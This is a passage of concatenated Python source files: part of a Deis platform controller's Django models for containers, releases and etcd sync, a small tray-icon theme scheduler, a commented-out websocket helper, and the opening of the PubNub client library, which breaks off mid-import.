"v{}".format(release.version) kwargs = {'memory': release.config.memory, 'cpu': release.config.cpu, 'tags': release.config.tags, 'version': version, 'aname': self.id, 'num': scale_types[scale_type]} job_id = self._get_job_id(scale_type) command = self._get_command(scale_type) try: self._scheduler.scale( name=job_id, image=image, command=command, **kwargs) except Exception as e: err = '{} (scale): {}'.format(job_id, e) log_event(self, err, logging.ERROR) raise [c.delete() for c in to_remove] def _start_containers(self, to_add): """Creates and starts containers via the scheduler""" if not to_add: return create_threads = [Thread(target=c.create) for c in to_add] start_threads = [Thread(target=c.start) for c in to_add] [t.start() for t in create_threads] [t.join() for t in create_threads] if any(c.state != 'created' for c in to_add): err = 'aborting, failed to create some containers' log_event(self, err, logging.ERROR) self._destroy_containers(to_add) raise RuntimeError(err) [t.start() for t in start_threads] [t.join() for t in start_threads] if set([c.state for c in to_add]) != set(['up']): err = 'warning, some containers failed to start' log_event(self, err, logging.WARNING) # if the user specified a health check, try checking to see if it's running try: config = self.config_set.latest() if 'HEALTHCHECK_URL' in config.values.keys(): self._healthcheck(to_add, config.values) except Config.DoesNotExist: pass def _healthcheck(self, containers, config): # if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY intervals = [1.0, 0.1, 0.5, 1.0] # HACK (bacongobbler): we need to wait until publisher has a chance to publish each # service to etcd, which can take up to 20 seconds. time.sleep(20) for i in xrange(len(intervals)): delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0)) try: # sleep until the initial timeout is over if delay > 0: time.sleep(delay * intervals[i]) self._do_healthcheck(containers, config) break except exceptions.HealthcheckException as e: try: next_delay = delay * intervals[i+1] msg = "{}; trying again in {} seconds".format(e, next_delay) log_event(self, msg, logging.WARNING) except IndexError: log_event(self, e, logging.WARNING) else: self._destroy_containers(containers) msg = "aborting, app containers failed to respond to health check" log_event(self, msg, logging.ERROR) raise RuntimeError(msg) def _do_healthcheck(self, containers, config): path = config.get('HEALTHCHECK_URL', '/') timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1)) if not _etcd_client: raise exceptions.HealthcheckException('no etcd client available') for container in containers: try: key = "/deis/services/{self}/{container.job_id}".format(**locals()) url = "http://{}{}".format(_etcd_client.get(key).value, path) response = requests.get(url, timeout=timeout) if response.status_code != requests.codes.OK: raise exceptions.HealthcheckException( "app failed health check (got '{}', expected: '200')".format( response.status_code)) except (requests.Timeout, requests.ConnectionError, KeyError) as e: raise exceptions.HealthcheckException( 'failed to connect to container ({})'.format(e)) def _restart_containers(self, to_restart): """Restarts containers via the scheduler""" if not to_restart: return stop_threads = [Thread(target=c.stop) for c in to_restart] start_threads = [Thread(target=c.start) for c in to_restart] [t.start() for t in stop_threads] [t.join() for t in stop_threads] if any(c.state != 'created' for c in to_restart): err = 'warning, some containers failed to stop' log_event(self, err, logging.WARNING) [t.start() for t in start_threads] [t.join() for t in start_threads] if any(c.state != 'up' for c in to_restart): err = 'warning, some containers failed to start' log_event(self, err, logging.WARNING) def _destroy_containers(self, to_destroy): """Destroys containers via the scheduler""" if not to_destroy: return destroy_threads = [Thread(target=c.destroy) for c in to_destroy] [t.start() for t in destroy_threads] [t.join() for t in destroy_threads] [c.delete() for c in to_destroy if c.state == 'destroyed'] if any(c.state != 'destroyed' for c in to_destroy): err = 'aborting, failed to destroy some containers' log_event(self, err, logging.ERROR) raise RuntimeError(err) def deploy(self, user, release): """Deploy a new release to this application""" existing = self.container_set.exclude(type='run') new = [] scale_types = set() for e in existing: n = e.clone(release) n.save() new.append(n) scale_types.add(e.type) if new and "deploy" in dir(self._scheduler): self._deploy_app(scale_types, release, existing) else: self._start_containers(new) # destroy old containers if existing: self._destroy_containers(existing) # perform default scaling if necessary if self.structure == {} and release.build is not None: self._default_scale(user, release) def _deploy_app(self, scale_types, release, existing): for scale_type in scale_types: image = release.image version = "v{}".format(release.version) kwargs = {'memory': release.config.memory, 'cpu': release.config.cpu, 'tags': release.config.tags, 'aname': self.id, 'num': 0, 'version': version} job_id = self._get_job_id(scale_type) command = self._get_command(scale_type) try: self._scheduler.deploy( name=job_id, image=image, command=command, **kwargs) except Exception as e: err = '{} (deploy): {}'.format(job_id, e) log_event(self, err, logging.ERROR) raise [c.delete() for c in existing] def _default_scale(self, user, release): """Scale to default structure based on release type""" # if there is no SHA, assume a docker image is being promoted if not release.build.sha: structure = {'cmd': 1} # if a dockerfile exists without a procfile, assume docker workflow elif release.build.dockerfile and not release.build.procfile: structure = {'cmd': 1} # if a procfile exists without a web entry, assume docker workflow elif release.build.procfile and 'web' not in release.build.procfile: structure = {'cmd': 1} # default to heroku workflow else: structure = {'web': 1} self.scale(user, structure) def logs(self, log_lines=str(settings.LOG_LINES)): """Return aggregated log data for this application.""" path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log') if not os.path.exists(path): raise EnvironmentError('Could not locate logs') data = subprocess.check_output(['tail', '-n', log_lines, path]) return data def run(self, user, command): """Run a one-off command in an ephemeral app container.""" # FIXME: remove the need for SSH private keys by using # a scheduler that supports one-off admin tasks natively if not settings.SSH_PRIVATE_KEY: raise EnvironmentError('Support for admin commands is not configured') if self.release_set.latest().build is None: raise EnvironmentError('No build associated with this release to run this command') # TODO: add support for interactive shell msg = "{} runs '{}'".format(user.username, command) log_event(self, msg) c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1 # create database record for run process c = Container.objects.create(owner=self.owner, app=self, release=self.release_set.latest(), type='run', num=c_num) image = c.release.image # check for backwards compatibility def _has_hostname(image): repo, tag = dockerutils.parse_repository_tag(image) return True if '/' in repo and '.' in repo.split('/')[0] else False if not _has_hostname(image): image = '{}:{}/{}'.format(settings.REGISTRY_HOST, settings.REGISTRY_PORT, image) # SECURITY: shell-escape user input escaped_command = command.replace("'", "'\\''") return c.run(escaped_command) @python_2_unicode_compatible class Container(UuidAuditedModel): """ Docker container used to securely host an application process. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') release = models.ForeignKey('Release') type = models.CharField(max_length=128, blank=False) num = models.PositiveIntegerField() @property def _scheduler(self): return self.app._scheduler @property def state(self): return self._scheduler.state(self.job_id).name def short_name(self): return "{}.{}.{}".format(self.app.id, self.type, self.num) short_name.short_description = 'Name' def __str__(self): return self.short_name() class Meta: get_latest_by = '-created' ordering = ['created'] @property def job_id(self): version = "v{}".format(self.release.version) return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals()) def _get_command(self): try: # if this is not procfile-based app, ensure they cannot break out # and run arbitrary commands on the host # FIXME: remove slugrunner's hardcoded entrypoint if self.release.build.dockerfile or not self.release.build.sha: return "bash -c '{}'".format(self.release.build.procfile[self.type]) else: return 'start {}'.format(self.type) # if the key is not present or if a parent attribute is None except (KeyError, TypeError, AttributeError): # handle special case for Dockerfile deployments return '' if self.type == 'cmd' else 'start {}'.format(self.type) _command = property(_get_command) def clone(self, release): c = Container.objects.create(owner=self.owner, app=self.app, release=release, type=self.type, num=self.num) return c @close_db_connections def create(self): image = self.release.image kwargs = {'memory': self.release.config.memory, 'cpu': self.release.config.cpu, 'tags': self.release.config.tags} try: self._scheduler.create( name=self.job_id, image=image, command=self._command, **kwargs) except Exception as e: err = '{} (create): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @close_db_connections def start(self): try: self._scheduler.start(self.job_id) except Exception as e: err = '{} (start): {}'.format(self.job_id, e) log_event(self.app, err, logging.WARNING) raise @close_db_connections def stop(self): try: self._scheduler.stop(self.job_id) except Exception as e: err = '{} (stop): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @close_db_connections def destroy(self): try: self._scheduler.destroy(self.job_id) except Exception as e: err = '{} (destroy): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise def run(self, command): """Run a one-off command""" if self.release.build is None: raise EnvironmentError('No build associated with this release ' 'to run this command') image = self.release.image entrypoint = '/bin/bash' # if this is a procfile-based app, switch the entrypoint to slugrunner's default # FIXME: remove slugrunner's hardcoded entrypoint if self.release.build.procfile and \ self.release.build.sha and not \ self.release.build.dockerfile: entrypoint = '/runner/init' command = "'{}'".format(command) else: command = "-c '{}'".format(command) try: rc, output = self._scheduler.run(self.job_id, image, entrypoint, command) return rc, output except Exception as e: err = '{} (run): {}'.format(self.job_id, e) log_event(self.app, err, logging.ERROR) raise @python_2_unicode_compatible class Push(UuidAuditedModel): """ Instance of a push used to trigger an application build """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') sha = models.CharField(max_length=40) fingerprint = models.CharField(max_length=255) receive_user = models.CharField(max_length=255) receive_repo = models.CharField(max_length=255) ssh_connection = models.CharField(max_length=255) ssh_original_command = models.CharField(max_length=255) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def __str__(self): return "{0}-{1}".format(self.app.id, self.sha[:7]) @python_2_unicode_compatible class Build(UuidAuditedModel): """ Instance of a software build used by runtime nodes """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') image = models.CharField(max_length=256) # optional fields populated by builder sha = models.CharField(max_length=40, blank=True) procfile = JSONField(default={}, blank=True) dockerfile = models.TextField(blank=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def create(self, user, *args, **kwargs): latest_release = self.app.release_set.latest() source_version = 'latest' if self.sha: source_version = 'git-{}'.format(self.sha) new_release = latest_release.new(user, build=self, config=latest_release.config, source_version=source_version) try: self.app.deploy(user, new_release) return new_release except RuntimeError: new_release.delete() raise def save(self, **kwargs): try: previous_build = self.app.build_set.latest() to_destroy = [] for proctype in previous_build.procfile: if proctype not in self.procfile: for c in self.app.container_set.filter(type=proctype): to_destroy.append(c) self.app._destroy_containers(to_destroy) except Build.DoesNotExist: pass return super(Build, self).save(**kwargs) def __str__(self): return "{0}-{1}".format(self.app.id, self.uuid[:7]) @python_2_unicode_compatible class Config(UuidAuditedModel): """ Set of configuration values applied as environment variables during runtime execution of the Application. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') values = JSONField(default={}, blank=True) memory = JSONField(default={}, blank=True) cpu = JSONField(default={}, blank=True) tags = JSONField(default={}, blank=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'uuid'),) def __str__(self): return "{}-{}".format(self.app.id, self.uuid[:7]) def save(self, **kwargs): """merge the old config with the new""" try: previous_config = self.app.config_set.latest() for attr in ['cpu', 'memory', 'tags', 'values']: # Guard against migrations from older apps without fixes to # JSONField encoding. try: data = getattr(previous_config, attr).copy() except AttributeError: data = {} try: new_data = getattr(self, attr).copy() except AttributeError: new_data = {} data.update(new_data) # remove config keys if we provided a null value [data.pop(k) for k, v in new_data.viewitems() if v is None] setattr(self, attr, data) except Config.DoesNotExist: pass return super(Config, self).save(**kwargs) @python_2_unicode_compatible class Release(UuidAuditedModel): """ Software release deployed by the application platform Releases contain a :class:`Build` and a :class:`Config`. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') version = models.PositiveIntegerField() summary = models.TextField(blank=True, null=True) config = models.ForeignKey('Config') build = models.ForeignKey('Build', null=True) class Meta: get_latest_by = 'created' ordering = ['-created'] unique_together = (('app', 'version'),) def __str__(self): return "{0}-v{1}".format(self.app.id, self.version) @property def image(self): return '{}:v{}'.format(self.app.id, str(self.version)) def new(self, user, config, build, summary=None, source_version='latest'): """ Create a new application release using the provided Build and Config on behalf of a user. Releases start at v1 and auto-increment. """ # construct fully-qualified target image new_version = self.version + 1 # create new release and auto-increment version release = Release.objects.create( owner=user, app=self.app, config=config, build=build, version=new_version, summary=summary) try: release.publish() except EnvironmentError as e: # If we cannot publish this app, just log and carry on log_event(self.app, e) pass return release def publish(self, source_version='latest'): if self.build is None: raise EnvironmentError('No build associated with this release to publish') source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version source_image = '{}:{}'.format(self.build.image, source_tag) # IOW, this image did not come from the builder # FIXME: remove check for mock registry module if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE: # we assume that the image is not present on our registry, # so shell out a task to pull in the repository data = { 'src': self.build.image } requests.post( '{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL, self.app.id), data=data, ) # update the source image to the repository we just imported source_image = self.app.id # if the image imported had a tag specified, use that tag as the source if ':' in self.build.image: if '/' not in self.build.image[self.build.image.rfind(':') + 1:]: source_image += self.build.image[self.build.image.rfind(':'):] publish_release(source_image, self.config.values, self.image) def previous(self): """ Return the previous Release to this one. :return: the previous :class:`Release`, or None """ releases = self.app.release_set if self.pk: releases = releases.exclude(pk=self.pk) try: # Get the Release previous to this one prev_release = releases.latest() except Release.DoesNotExist: prev_release = None return prev_release def rollback(self, user, version): if version < 1: raise EnvironmentError('version cannot be below 0') summary = "{} rolled back to v{}".format(user, version) prev = self.app.release_set.get(version=version) new_release = self.new( user, build=prev.build, config=prev.config, summary=summary, source_version='v{}'.format(version)) try: self.app.deploy(user, new_release) return new_release except RuntimeError: new_release.delete() raise def save(self, *args, **kwargs): # noqa if not self.summary: self.summary = '' prev_release = self.previous() # compare this build to the previous build old_build = prev_release.build if prev_release else None old_config = prev_release.config if prev_release else None # if the build changed, log it and who pushed it if self.version == 1: self.summary += "{} created initial release".format(self.app.owner) elif self.build != old_build: if self.build.sha: self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7]) else: self.summary += "{} deployed {}".format(self.build.owner, self.build.image) # if the config data changed, log the dict diff if self.config != old_config: dict1 = self.config.values dict2 = old_config.values if old_config else {} diff = dict_diff(dict1, dict2) # try to be as succinct as possible added = ', '.join(k for k in diff.get('added', {})) added = 'added ' + added if added else '' changed = ', '.join(k for k in diff.get('changed', {})) changed = 'changed ' + changed if changed else '' deleted = ', '.join(k for k in diff.get('deleted', {})) deleted = 'deleted ' + deleted if deleted else '' changes = ', '.join(i for i in (added, changed, deleted) if i) if changes: if self.summary: self.summary += ' and ' self.summary += "{} {}".format(self.config.owner, changes) # if the limits changed (memory or cpu), log the dict diff changes = [] old_mem = old_config.memory if old_config else {} diff = dict_diff(self.config.memory, old_mem) if diff.get('added') or diff.get('changed') or diff.get('deleted'): changes.append('memory') old_cpu = old_config.cpu if old_config else {} diff = dict_diff(self.config.cpu, old_cpu) if diff.get('added') or diff.get('changed') or diff.get('deleted'): changes.append('cpu') if changes: changes = 'changed limits for '+', '.join(changes) self.summary += "{} {}".format(self.config.owner, changes) # if the tags changed, log the dict diff changes = [] old_tags = old_config.tags if old_config else {} diff = dict_diff(self.config.tags, old_tags) # try to be as succinct as possible added = ', '.join(k for k in diff.get('added', {})) added = 'added tag ' + added if added else '' changed = ', '.join(k for k in diff.get('changed', {})) changed = 'changed tag ' + changed if changed else '' deleted = ', '.join(k for k in diff.get('deleted', {})) deleted = 'deleted tag ' + deleted if deleted else '' changes = ', '.join(i for i in (added, changed, deleted) if i) if changes: if self.summary: self.summary += ' and ' self.summary += "{} {}".format(self.config.owner, changes) if not self.summary: if self.version == 1: self.summary = "{} created the initial release".format(self.owner) else: self.summary = "{} changed nothing".format(self.owner) super(Release, self).save(*args, **kwargs) @python_2_unicode_compatible class Domain(AuditedModel): owner = models.ForeignKey(settings.AUTH_USER_MODEL) app = models.ForeignKey('App') domain = models.TextField(blank=False, null=False, unique=True) def __str__(self): return self.domain @python_2_unicode_compatible class Certificate(AuditedModel): """ Public and private key pair used to secure application traffic at the router. """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) # there is no upper limit on the size of an x.509 certificate certificate = models.TextField(validators=[validate_certificate]) key = models.TextField() # X.509 certificates allow any string of information as the common name. common_name = models.TextField(unique=True) expires = models.DateTimeField() def __str__(self): return self.common_name def _get_certificate(self): try: return crypto.load_certificate(crypto.FILETYPE_PEM, self.certificate) except crypto.Error as e: raise SuspiciousOperation(e) def save(self, *args, **kwargs): certificate = self._get_certificate() if not self.common_name: self.common_name = certificate.get_subject().CN if not self.expires: # convert openssl's expiry date format to Django's DateTimeField format self.expires = datetime.strptime(certificate.get_notAfter(), '%Y%m%d%H%M%SZ') return super(Certificate, self).save(*args, **kwargs) @python_2_unicode_compatible class Key(UuidAuditedModel): """An SSH public key.""" owner = models.ForeignKey(settings.AUTH_USER_MODEL) id = models.CharField(max_length=128) public = models.TextField(unique=True, validators=[validate_base64]) fingerprint = models.CharField(max_length=128) class Meta: verbose_name = 'SSH Key' unique_together = (('owner', 'fingerprint')) def __str__(self): return "{}...{}".format(self.public[:18], self.public[-31:]) def save(self, *args, **kwargs): self.fingerprint = fingerprint(self.public) return super(Key, self).save(*args, **kwargs) # define update/delete callbacks for synchronizing # models with the configuration management backend def _log_build_created(**kwargs): if kwargs.get('created'): build = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: build {} created".format(build.app, build)) def _log_release_created(**kwargs): if kwargs.get('created'): release = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: release {} created".format(release.app, release)) # append release lifecycle logs to the app release.app.log(release.summary) def _log_config_updated(**kwargs): config = kwargs['instance'] # log only to the controller; this event will be logged in the release summary logger.info("{}: config {} updated".format(config.app, config)) def _log_domain_added(**kwargs): domain = kwargs['instance'] msg = "domain {} added".format(domain) log_event(domain.app, msg) def _log_domain_removed(**kwargs): domain = kwargs['instance'] msg = "domain {} removed".format(domain) log_event(domain.app, msg) def _log_cert_added(**kwargs): cert = kwargs['instance'] logger.info("cert {} added".format(cert)) def _log_cert_removed(**kwargs): cert = kwargs['instance'] logger.info("cert {} removed".format(cert)) def _etcd_publish_key(**kwargs): key = kwargs['instance'] _etcd_client.write('/deis/builder/users/{}/{}'.format( key.owner.username, fingerprint(key.public)), key.public) def _etcd_purge_key(**kwargs): key = kwargs['instance'] try: _etcd_client.delete('/deis/builder/users/{}/{}'.format( key.owner.username, fingerprint(key.public))) except KeyError: pass def _etcd_purge_user(**kwargs): username = kwargs['instance'].username try: _etcd_client.delete( '/deis/builder/users/{}'.format(username), dir=True, recursive=True) except KeyError: # If _etcd_publish_key() wasn't called, there is no user dir to delete. pass def _etcd_create_app(**kwargs): appname = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/services/{}'.format(appname), None, dir=True) def _etcd_purge_app(**kwargs): appname = kwargs['instance'] try: _etcd_client.delete('/deis/services/{}'.format(appname), dir=True, recursive=True) except KeyError: pass def _etcd_publish_cert(**kwargs): cert = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/certs/{}/cert'.format(cert), cert.certificate) _etcd_client.write('/deis/certs/{}/key'.format(cert), cert.key) def _etcd_purge_cert(**kwargs): cert = kwargs['instance'] try: _etcd_client.delete('/deis/certs/{}'.format(cert), prevExist=True, dir=True, recursive=True) except KeyError: pass def _etcd_publish_config(**kwargs): config = kwargs['instance'] # we purge all existing config when adding the newest instance. This is because # deis config:unset would remove an existing value, but not delete the # old config object try: _etcd_client.delete('/deis/config/{}'.format(config.app), prevExist=True, dir=True, recursive=True) except KeyError: pass if kwargs['created']: for k, v in config.values.iteritems(): _etcd_client.write( '/deis/config/{}/{}'.format( config.app, unicode(k).encode('utf-8').lower()), unicode(v).encode('utf-8')) def _etcd_purge_config(**kwargs): config = kwargs['instance'] try: _etcd_client.delete('/deis/config/{}'.format(config.app), prevExist=True, dir=True, recursive=True) except KeyError: pass def _etcd_publish_domains(**kwargs): domain = kwargs['instance'] if kwargs['created']: _etcd_client.write('/deis/domains/{}'.format(domain), domain.app) def _etcd_purge_domains(**kwargs): domain = kwargs['instance'] try: _etcd_client.delete('/deis/domains/{}'.format(domain), prevExist=True, dir=True, recursive=True) except KeyError: pass # Log significant app-related events post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log') post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log') post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log') post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log') post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log') post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log') post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log') # automatically generate a new token on creation @receiver(post_save, sender=get_user_model()) def create_auth_token(sender, instance=None, created=False, **kwargs): if created: Token.objects.create(user=instance) _etcd_client = get_etcd_client() if _etcd_client: post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models') post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models') post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models') post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models') post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models') post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models') post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models') post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models') post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models') post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models') post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
sunset-gui.py
#!/usr/bin/python # baby 1st python script # needs pip install pystray # needs pip install schedule import os import sys import json import schedule import time from threading import Thread import pystray from pystray import Icon as icon, Menu as menu, MenuItem as item from PIL import Image PROGDIR=os.path.dirname(os.path.realpath(__file__)) PROGCONFIGDIR= PROGDIR + '/config' PROGCONFIGFILE= PROGCONFIGDIR + '/gui-config.json' PROGLOGFILE= PROGDIR + '/sunset.log' def lightTheme(): # loads config.json into f with open(PROGCONFIGFILE, 'r') as f: configs = json.load(f) # loads json values into vars sunsetLocation = configs['sunsetLocation'] lightThemeName = configs['lightTheme'] lightThemeSetting = configs['lightThemeSetting'] # sends info to sunset os.system("bash "+ sunsetLocation + " " + lightThemeSetting + " " + lightThemeName) # closes config.json f.close() def darkTheme(): # loads config.json into f with open(PROGCONFIGFILE, 'r') as f: configs = json.load(f) # loads json values into vars sunsetLocation = configs['sunsetLocation'] darkThemeName = configs['darkTheme'] darkThemeSetting = configs['darkThemeSetting'] # sends info to sunset os.system("bash "+ sunsetLocation + " " + darkThemeSetting + " " + darkThemeName) # closes config.json f.close() def editConfig(): os.system("kitty nano " + PROGCONFIGFILE) def openLog(): os.system("kitty nano " + PROGLOGFILE) def scheduleFunction(): while True: schedule.run_pending() time.sleep(1) def iconTrayFunction(): icon.run() def test(): now = datetime.now() print(now) def quit(): print('Quitting...') # https://stackoverflow.com/a/1489838 # exit and kill all threads os._exit(1) if __name__ == "__main__": image = Image.open(PROGCONFIGDIR + "/icon.png") menu = (item('Light theme', lightTheme), item('Dark Theme', darkTheme), item('More...', menu( item('Edit config',editConfig), item('Open log',openLog), item('Exit',quit)))) icon = pystray.Icon("sunset", image, "sunset", menu) schedule.every().day.at("10:00").do(lightTheme) schedule.every().day.at("18:00").do(darkTheme) # creates threads scheduleThread = Thread(target=scheduleFunction) trayIconThread = Thread(target=iconTrayFunction) # start threads scheduleThread.start() trayIconThread.start() # wait for thread completion scheduleThread.join() trayIconThread.join()
web_socket_util.py
# # -*- coding: utf-8 -*- # # import json # import os # import socket # import threading # from time import sleep # import time # # from dwebsocket.decorators import accept_websocket # # logger = logging.getLogger('django') # from comUtil import get_except # from httpUtil import HttpClass # from stringUtil import get_uuid, time_to_db, get_stamp_now, \ # dbtime_to_timestamp # from dbUtil import sql_exec # from SRMCenter.models.models import WebsocketMsg, WebsocketMsgPid # # # mutex = threading.Lock() # # # def initMsgQueue(): # """ # | ##@函数目的: 清理消息队列 # | ##@参数说明:https://github.com/duanhongyi/dwebsocket # | ##@返回值: # | ##@函数逻辑: # | ##@开发人:jhuang # | ##@时间: # """ # logger.debug('初始化消息队列...') # WebsocketMsgPid.objects.all().delete() # WebsocketMsg.objects.all().delete() # # threading.Thread(target=queryMsgQueue).start() # # # # def websocketServer_SendMsg(msgtype,msg): # # logger.debug('提交websocket消息到队列:%s' %(msg)) # WebsocketMsg(msg=msg,type=msgtype,msg_id=get_uuid(),send_time=time_to_db()).save() # # # # def queryMsgQueue(): # ''' # 检查是否有消息需要发送 # ''' # mutex.acquire() # logger.debug('监控websocket消息队列...') # while 1: # oWebsocketMsgs=WebsocketMsg.objects.all() # for r in oWebsocketMsgs: # msgtype=r.type # msg=r.msg # msg_id=r.msg_id # send_time= str(r.send_time ) # # print send_time # t2=dbtime_to_timestamp(send_time) # # print t2 # # print get_stamp_now() # oWebsocketMsgPids2=WebsocketMsgPid.objects.filter(msg_id=msg_id) # if get_stamp_now()-t2>60*1: # r.delete() # oWebsocketMsgPids2.delete() # # logger.debug('消息已经过期,清理消息...(msg_id:%s)'%(msg_id)) # # # oWebsocketMsgPids=WebsocketMsgPid.objects.filter(msg_id=msg_id,pid=os.getpid()) # if len(oWebsocketMsgPids)>0: # pass # # logger.debug('已经过,不在发送...') # # if len(oWebsocketMsgPids2)>=8: # # logger.debug('全部发送完成,清理消息...(msg_id:%s)'%(msg_id)) # # oWebsocketMsgPids2.delete() # # WebsocketMsgPid.objects.filter(msg_id=msg_id).delete() # # else: # sql_exec('insert into websocket_msg_pid (msg_id,pid) values(%s,%s)',[msg_id,os.getpid()],False) # _websocketServer_SendMsg(msgtype,msg) # # sleep(5) # # # # # # # # # clients = [] # # @accept_websocket # def websocketServer(request): # """ # | ##@函数目的: 开启一个websocke服务 # | ##@参数说明:https://github.com/duanhongyi/dwebsocket # | ##@返回值: # | ##@函数逻辑: # | ##@开发人:jhuang # | ##@时间: # """ # # logger.debug('开启websocket服务...') # try: # if request.is_websocket: # clients.append(request.websocket) # for message in request.websocket: # for client in clients: # if message!=None: # client.send(message) # except Exception as e: # clients.remove(request.websocket) # logger.error('uwebsocket 通道异常 :%s' %(get_except(e))) # # logger.info ( {0}'.format(ex)) # finally: # pass # # # # # # # # 向客户端推消息 # def _websocketServer_SendMsg(msgtype,msg): # msgdic={} # msgdic['msgType'] = unicode(msgtype).encode('UTF-8') # msgdic['msg'] = unicode(msg).encode('UTF-8') # msg=json.dumps(msgdic, ensure_ascii=False) # if len(clients)<=0 : # return False # # logger.debug('发送websocket消息,失败:无客户端连接!') # for client in clients: # try: # # logger.debug('发送websocket消息:%s' %(msg)) # client.send(msg) # except Exception , e: # logger.error( u'websocket发消息:{0} 出现异常 --> %s'%(get_except(e))) # # # # # # # # #
pubnub.py
## www.pubnub.com - PubNub Real-time push service in the cloud. # coding=utf8 ## PubNub Real-time Push APIs and Notifications Framework ## Copyright (c) 2014-15 Stephen Blum ## http://www.pubnub.com/ ## ----------------------------------- ## PubNub 3.7.3 Real-time Push Cloud API ## ----------------------------------- try: import json except ImportError: import simplejson as json import time import hashlib import uuid as uuid_lib import random import sys import copy from base64 import urlsafe_b64encode from base64 import encodestring, decodestring import hmac from Crypto.Cipher import AES try: from hashlib import sha256 digestmod = sha256 except ImportError: import Crypto.Hash.SHA256 as digestmod sha256 = digestmod.new ##### vanilla python imports ##### try: from urllib.parse import quote except ImportError: from urllib2 import quote try: import urllib.request except ImportError: import urllib2 try: import requests from requests.adapters import HTTPAdapter except ImportError: pass #import urllib import socket import threading try: import urllib3.HTTPConnection default_socket_options = urllib3.HTTPConnection.default_socket_options except: default_socket_options = [] default_socket_options += [ # Enable TCP keepalive (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) ] if sys.platform.startswith("linux"): default_socket_options += [ # Send first keepalive packet 200 seconds after last data packet (socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 200), # Resend keepalive packets every second, when unanswered (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1), # Close the socket after 5 unanswered keepalive packets (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5) ] elif sys.platform.startswith("darwin"): # From /usr/include/netinet/tcp.h # idle time used when SO_KEEPALIVE is enabled socket.TCP_KEEPALIVE = socket.TCP_KEEPALIVE \ if hasattr(socket, 'TCP_KEEPALIVE') \ else 0x10 # interval between keepalives socket.TCP_KEEPINTVL = socket.TCP_KEEPINTVL \ if hasattr(socket, 'TCP_KEEPINTVL') \ else 0x101 # number of keepalives before close socket.TCP_KEEPCNT = socket.TCP_KEEPCNT \ if hasattr(socket, 'TCP_KEEPCNT') \ else 0x102 default_socket_options += [ # Send first keepalive packet 200 seconds after last data packet (socket.IPPROTO_TCP, socket.TCP_KEEPALIVE, 200), # Resend keepalive packets every second, when unanswered (socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 1), # Close the socket after 5 unanswered keepalive packets (socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5) ] """ # The Windows code is currently untested elif sys.platform.startswith("win"): import struct from urllib3.connectionpool import HTTPConnectionPool, HTTPSConnectionPool def patch_socket_keepalive(conn): conn.sock.ioctl(socket.SIO_KEEPALIVE_VALS, ( # Enable TCP keepalive 1, # Send first keepalive packet 200 seconds after last data packet 200, # Resend keepalive packets every second, when unanswered 1 )) class PubnubHTTPConnectionPool(HTTPConnectionPool): def _validate_conn(self, conn): super(PubnubHTTPConnectionPool, self)._validate_conn(conn) class PubnubHTTPSConnectionPool(HTTPSConnectionPool): def _validate_conn(self, conn): super(PubnubHTTPSConnectionPool, self)._validate_conn(conn) import urllib3.poolmanager urllib3.poolmanager.pool_classes_by_scheme = { 'http' : PubnubHTTPConnectionPool, 'https' : PubnubHTTPSConnectionPool } """ ################################## ##### Tornado imports and globals ##### try: import tornado.httpclient import tornado.ioloop from tornado.stack_context import ExceptionStackContext ioloop = tornado.ioloop.IOLoop.instance() except ImportError: pass ####################################### ##### Twisted imports and globals ##### try: from twisted.internet import reactor from twisted.internet.defer import Deferred from twisted.internet.protocol import Protocol from twisted.web.client import Agent, ContentDecoderAgent from twisted.web.client import 